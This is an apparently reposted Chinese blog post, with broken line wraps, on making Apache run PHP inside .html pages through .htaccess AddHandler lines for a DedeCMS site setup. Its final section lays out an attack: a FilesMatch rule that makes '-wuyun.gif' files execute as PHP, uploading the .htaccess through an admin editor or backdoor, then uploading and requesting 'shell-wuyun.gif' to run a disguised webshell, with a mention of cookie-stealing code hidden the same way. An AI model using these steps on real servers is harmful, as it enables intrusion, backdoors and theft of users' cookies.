前端之家收集整理的这篇文章主要介绍了
让织梦dedecms静态页面嵌入php代码也能成功执行,
前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
这种
方法也是最近看apache的conf才发现的,说是小bug,感觉又不是,只是容易被人利用。我们最近在做织梦站群系统: 遇到一个难题,就是
页面随机重组
文章后,必须实时
生成,想了下如果每次都
生成,而
文章量又非常多,那么真是麻烦死了,于是用到这个
方法。
支持环境:apache(其他的ngnix自己可以扩展思路)
文件:.htacess
文件
情节:正常情况HTML
页面中运行
PHP代码的基本
方法是将.html和.htm
修改成.
PHP。如果你已经有许多包含
PHP代码的HTML的
页面,同时还不想逐个
修改它们扩展名。你可以在htaccess
文件中配置一下,让所有的
页面都当作
PHP文件解释。
方法如下:
打开文本
编辑器,windows上的笔记本,Linux上的vi编辑器,在htaccess
文件中
添加如下行。
AddHandler x-mapp-
PHP5 .html .htm
如果你想使用
PHP 5.4而不是
PHP 5.2,你可以
添加下面的这一行。
AddHandler x-mapp-
PHP6 .html .htm
这样就会指定所有扩展名为.html和.htm的
文件都会经过
PHP解释执行。根据需要
添加上面的
代码后,将
文件保存即可。
腹黑扩展:
利用.:htaccess
文件来执行
PHP脚本达到图像
文件以
PHP执行,比如可以将cookiee suffering相关
代码写入
PHP文件,再把
图片嵌入到一个
页面当中。
利用步骤:
1.创建一个htaccess文件:
代码内容:(
加入红色部分即可,其余可以不要复制)
<VirtualHost *:80>
DocumentRoot /www/web/bd
ServerName baidu.com
RewriteEngine on
RewriteRule ^(.*)$ http://www.baidu.com$1 [R=
301,L]
</VirtualHost>
<FilesMatch “-wuyun.gif”>
SetHandler application/x-httpd-PHP
</FilesMatch>
<Directory /www/web/jcrs055>
Options FollowSymLinks
AllowOverride All
Order allow,deny
Allow from all
</Directory>
2.从后台编辑器或后门中上传htaccess文件.
3.上传shell-wuyun.gif
4.上传后,如果访问这个图片会以PHP文件执行。